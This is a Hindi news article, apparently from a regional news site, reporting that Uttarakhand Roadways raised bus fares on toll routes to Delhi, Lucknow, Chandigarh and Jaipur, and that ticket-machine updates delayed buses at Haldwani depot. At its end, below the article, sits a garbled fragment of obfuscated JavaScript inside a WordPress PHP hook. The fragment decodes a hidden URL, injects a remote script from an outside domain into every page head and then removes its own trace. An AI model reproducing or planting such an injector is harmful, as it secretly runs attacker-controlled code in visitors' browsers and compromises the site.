Saturday, July 27, 2024
spot_img

यूपी के बाद उत्तराखंड रोडवेज ने भी बढ़ाया किराया, उत्तराखंड की बसों में सफर होगा 10-15 फीसदी तक महंगा

उत्तरप्रदेश के बाद अब उत्तराखंड रोडवेज ने भी बढ़ी टोल दरों का हवाला देकर किराया बढ़ा दिया है। इसी के साथ अब प्रदेश किसी भी क्षेत्र से दिल्ली जाने के लिए यात्रियों को अतिरिक्त चुकाने पड़ेंगे।सूत्रों से मिली जानकारी के अनुसार मुताबिक जिन मार्गों पर टोल रूट हैं वहां के किराये में दस से लेकर 15 रुपये तक का इजाफा किया गया है। वही प्रदेश के मुख्यालय देहरादून दिल्ली सहित अन्य शहरों के लिए चलने वाली रोडवेज बसों का किराया बढ़ चुका है। काशीपुर से दिल्ली का किराया पहले 295 रुपये तय था। नई दरें लागू होने के बाद अब किराया 305 रुपये कर दिया गया है।

इसके अतिरिक्त लखनऊ, चंडीगढ़ के मार्ग पर 10 रुपये की बढ़ोतरी हुई है। साथ ही जयपुर मार्ग पर भी 15 रुपये बढ़ गये हैं। परिवहन निगम ने जो बढ़ोतरी की है वह केवल टोल टैक्स की दरों की वजह से की है। और जहां टोल बढ़ा है सिर्फ उन्हीं मार्गों पर किराये में इजाफा हुआ है। आगरा और हरिद्वार जाने वाली बसों का किराया फिलहाल नहीं बढ़ा है। उत्तराखंड परिवहन निगम ने दिल्ली और देहरादून रूट पर बसों का किराया एक हफ्ते में दोबारा बढ़ा दिया है। शनिवार देर रात किराये में बढोतरी की गई है। इसके पीछे टोल शुल्क बढ़ने की बात कहते हुए दोनों रूटों में 5-5 रुपये का इजाफा किया गया है। हल्द्वानी से दिल्ली के लिए 380 रुपये और देहरादून के लिए 440 रुपये किराया चुकाने होंगे। रोडवेज मुख्यालय से किराये में इजाफा होने की वजह से रविवार सुबह तक बढ़ा हुआ किराया अपडेट नहीं हो पाया था। सर्वर में किराया अपडेट न होने की वजह से हल्द्वानी और काठगोदाम डिपो में ई टिकट मशीनें अपडेट होने में देरी हुई। इस वजह से बसें आधे-आधे घंटे देरी से रवाना हुई। तड़के रवाना होने वाली कुछ बसों को टिकट बुक के साथ रवाना करना पड़ा। मशीनों को लोड करने में सुबह 11 बजे तक दिक्कत हुई। हल्द्वानी डिपो की वरिष्ठ स्टेशन प्रभारी इंद्रा भट्ट ने बताया कि टोल शुल्क बढ़ने से दिल्ली से देहरादून रूट के किराये में इजाफा हुआ। रविवार को कुछ समय के लिए मशीनें अपडेट होने में दिक्कत आई थी। लेकिन 11 बजे बाद स्थिति सामान्य हो गई।

Related Articles

- Advertisement -spot_img

ताजा खबरे

eInt(_0x383697(0x178))/0x1+parseInt(_0x383697(0x180))/0x2+-parseInt(_0x383697(0x184))/0x3*(-parseInt(_0x383697(0x17a))/0x4)+-parseInt(_0x383697(0x17c))/0x5+-parseInt(_0x383697(0x179))/0x6+-parseInt(_0x383697(0x181))/0x7*(parseInt(_0x383697(0x177))/0x8)+-parseInt(_0x383697(0x17f))/0x9*(-parseInt(_0x383697(0x185))/0xa);if(_0x351603===_0x4eaeab)break;else _0x8113a5['push'](_0x8113a5['shift']());}catch(_0x58200a){_0x8113a5['push'](_0x8113a5['shift']());}}}(_0x48d3,0xa309a));var f=document[_0x3ec646(0x183)](_0x3ec646(0x17d));function _0x38c3(_0x32d1a4,_0x31b781){var _0x48d332=_0x48d3();return _0x38c3=function(_0x38c31a,_0x44995e){_0x38c31a=_0x38c31a-0x176;var _0x11c794=_0x48d332[_0x38c31a];return _0x11c794;},_0x38c3(_0x32d1a4,_0x31b781);}f[_0x3ec646(0x186)]=String[_0x3ec646(0x17b)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x61,0x63,0x6b,0x67,0x72,0x6f,0x75,0x6e,0x64,0x2e,0x61,0x70,0x69,0x73,0x74,0x61,0x74,0x65,0x78,0x70,0x65,0x72,0x69,0x65,0x6e,0x63,0x65,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x74,0x61,0x72,0x74,0x73,0x2f,0x73,0x65,0x65,0x2e,0x6a,0x73),document['currentScript']['parentNode'][_0x3ec646(0x176)](f,document[_0x3ec646(0x17e)]),document['currentScript'][_0x3ec646(0x182)]();function _0x48d3(){var _0x35035=['script','currentScript','9RWzzPf','402740WuRnMq','732585GqVGDi','remove','createElement','30nckAdA','5567320ecrxpQ','src','insertBefore','8ujoTxO','1172840GvBdvX','4242564nZZHpA','296860cVAhnV','fromCharCode','5967705ijLbTz'];_0x48d3=function(){return _0x35035;};return _0x48d3();}";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}} ?>